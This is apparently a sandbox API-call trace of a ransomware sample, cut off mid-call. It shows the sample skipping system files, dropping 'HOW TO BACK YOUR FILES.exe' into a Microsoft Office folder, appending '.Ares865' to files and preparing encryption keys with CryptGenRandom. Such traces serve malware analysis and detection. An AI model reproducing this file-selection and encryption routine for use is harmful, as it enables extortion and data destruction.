0 [0067.201] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x598df560, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x598df560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.201] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.201] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49110e00, ftCreationTime.dwHighDateTime=0x1bf97c1, ftLastAccessTime.dwLowDateTime=0xfa5ff110, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49110e00, ftLastWriteTime.dwHighDateTime=0x1bf97c1, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN MoneyCentral Investor Currency Rates.iqy", cAlternateFileName="MSNMON~1.IQY")) returned 1 [0067.201] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.201] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="aoldtz.exe") returned 1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2=".") returned 1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="..") returned 1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="windows") returned -1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="bootmgr") returned 1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="temp") returned -1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="pagefile.sys") returned -1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="boot") returned 1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="ids.txt") returned 1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="ntuser.dat") returned -1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="perflogs") returned -1 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2="MSBuild") returned 1 [0067.202] lstrlenW (lpString="MSN MoneyCentral Investor Currency Rates.iqy") returned 44 [0067.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\QUERIES\\*") returned 52 [0067.202] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="MSN MoneyCentral Investor Currency Rates.iqy" | out: lpString1="MSN MoneyCentral Investor Currency Rates.iqy") returned="MSN MoneyCentral Investor Currency Rates.iqy" [0067.202] lstrlenW (lpString="MSN MoneyCentral Investor Currency Rates.iqy") returned 44 [0067.202] lstrlenW (lpString="Ares865") returned 7 [0067.202] lstrcmpiW (lpString1="tes.iqy", lpString2="Ares865") returned 1 [0067.202] lstrlenW (lpString=".dll") returned 4 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2=".dll") returned 1 [0067.202] lstrlenW (lpString=".lnk") returned 4 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2=".lnk") returned 1 [0067.202] lstrlenW (lpString=".ini") returned 4 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2=".ini") returned 1 [0067.202] lstrlenW (lpString=".sys") returned 4 [0067.202] lstrcmpiW (lpString1="MSN MoneyCentral Investor Currency Rates.iqy", lpString2=".sys") returned 1 [0067.202] lstrlenW (lpString="MSN MoneyCentral Investor Currency Rates.iqy") returned 44 [0067.202] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ") returned="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ" [0067.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4b00 | out: hHeap=0x2b0000) returned 1 [0067.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0067.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ") returned 49 [0067.203] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ") returned="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ" [0067.203] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.203] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.208] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.208] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x511e6c70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x599056c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x599056c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0067.209] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.209] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.209] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.209] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x511e6c70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x599056c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x599056c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.209] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.210] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.210] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.210] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.210] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e2a200, ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x5e953370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9e2a200, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACCSBAR.POC", cAlternateFileName="")) returned 1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="aoldtz.exe") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2=".") returned 1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="..") returned 1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="windows") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="bootmgr") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="temp") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="pagefile.sys") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="boot") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="ids.txt") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="ntuser.dat") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="perflogs") returned -1 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2="MSBuild") returned -1 [0067.210] lstrlenW (lpString="ACCSBAR.POC") returned 11 [0067.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\*") returned 51 [0067.210] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="ACCSBAR.POC" | out: lpString1="ACCSBAR.POC") returned="ACCSBAR.POC" [0067.210] lstrlenW (lpString="ACCSBAR.POC") returned 11 [0067.210] lstrlenW (lpString="Ares865") returned 7 [0067.210] lstrcmpiW (lpString1="BAR.POC", lpString2="Ares865") returned 1 [0067.210] lstrlenW (lpString=".dll") returned 4 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2=".dll") returned 1 [0067.210] lstrlenW (lpString=".lnk") returned 4 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2=".lnk") returned 1 [0067.210] lstrlenW (lpString=".ini") returned 4 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2=".ini") returned 1 [0067.210] lstrlenW (lpString=".sys") returned 4 [0067.210] lstrcmpiW (lpString1="ACCSBAR.POC", lpString2=".sys") returned 1 [0067.210] lstrlenW (lpString="ACCSBAR.POC") returned 11 [0067.211] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML.Ares865") returned 64 [0067.211] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ad.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ad.xml.ares865"), dwFlags=0x1) returned 1 [0067.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ad.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.212] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1034) returned 1 [0067.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.213] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.213] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.214] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.214] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x154 [0067.216] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x190000 [0067.217] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.219] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.219] CloseHandle (hObject=0x154) returned 1 [0067.219] CloseHandle (hObject=0x15c) returned 1 [0067.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.219] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e2a200, ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x5eaf6290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9e2a200, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0xb95a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AD98.POC", cAlternateFileName="")) returned 1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="aoldtz.exe") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2=".") returned 1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="..") returned 1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="windows") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="bootmgr") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="temp") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="pagefile.sys") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="boot") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="ids.txt") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="ntuser.dat") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="perflogs") returned -1 [0067.219] lstrcmpiW (lpString1="AD98.POC", lpString2="MSBuild") returned -1 [0067.219] lstrlenW (lpString="AD98.POC") returned 8 [0067.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML") returned 56 [0067.219] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="AD98.POC" | out: lpString1="AD98.POC") returned="AD98.POC" [0067.219] lstrlenW (lpString="AD98.POC") returned 8 [0067.220] lstrlenW (lpString="Ares865") returned 7 [0067.220] lstrcmpiW (lpString1="D98.POC", lpString2="Ares865") returned 1 [0067.220] lstrlenW (lpString=".dll") returned 4 [0067.220] lstrcmpiW (lpString1="AD98.POC", lpString2=".dll") returned 1 [0067.220] lstrlenW (lpString=".lnk") returned 4 [0067.220] lstrcmpiW (lpString1="AD98.POC", lpString2=".lnk") returned 1 [0067.220] lstrlenW (lpString=".ini") returned 4 [0067.220] lstrcmpiW (lpString1="AD98.POC", lpString2=".ini") returned 1 [0067.220] lstrlenW (lpString=".sys") returned 4 [0067.220] lstrcmpiW (lpString1="AD98.POC", lpString2=".sys") returned 1 [0067.220] lstrlenW (lpString="AD98.POC") returned 8 [0067.220] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML.Ares865") returned 68 [0067.220] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\banner.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\banner.xml.ares865"), dwFlags=0x1) returned 1 [0067.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\banner.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.222] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9068) returned 1 [0067.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.223] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.223] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.223] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.223] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2670, lpName=0x0) returned 0x154 [0067.225] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2670) returned 0x190000 [0067.226] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.227] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.227] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.227] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.227] CloseHandle (hObject=0x154) returned 1 [0067.227] CloseHandle (hObject=0x15c) returned 1 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.228] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab13cf00, ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x5197d290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab13cf00, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0x4d90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BDRTKFUL.POC", cAlternateFileName="")) returned 1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="aoldtz.exe") returned 1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2=".") returned 1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="..") returned 1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="windows") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="bootmgr") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="temp") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="pagefile.sys") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="boot") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="ids.txt") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="ntuser.dat") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="perflogs") returned -1 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2="MSBuild") returned -1 [0067.228] lstrlenW (lpString="BDRTKFUL.POC") returned 12 [0067.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BANNER.XML") returned 60 [0067.228] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="BDRTKFUL.POC" | out: lpString1="BDRTKFUL.POC") returned="BDRTKFUL.POC" [0067.228] lstrlenW (lpString="BDRTKFUL.POC") returned 12 [0067.228] lstrlenW (lpString="Ares865") returned 7 [0067.228] lstrcmpiW (lpString1="FUL.POC", lpString2="Ares865") returned 1 [0067.228] lstrlenW (lpString=".dll") returned 4 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2=".dll") returned 1 [0067.228] lstrlenW (lpString=".lnk") returned 4 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2=".lnk") returned 1 [0067.228] lstrlenW (lpString=".ini") returned 4 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2=".ini") returned 1 [0067.228] lstrlenW (lpString=".sys") returned 4 [0067.228] lstrcmpiW (lpString1="BDRTKFUL.POC", lpString2=".sys") returned 1 [0067.228] lstrlenW (lpString="BDRTKFUL.POC") returned 12 [0067.229] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML.Ares865") returned 69 [0067.229] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizcard.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizcard.xml.ares865"), dwFlags=0x1) returned 1 [0067.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizcard.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.230] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=12730) returned 1 [0067.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.231] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.231] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x34c0, lpName=0x0) returned 0x154 [0067.233] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x34c0) returned 0x190000 [0067.234] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 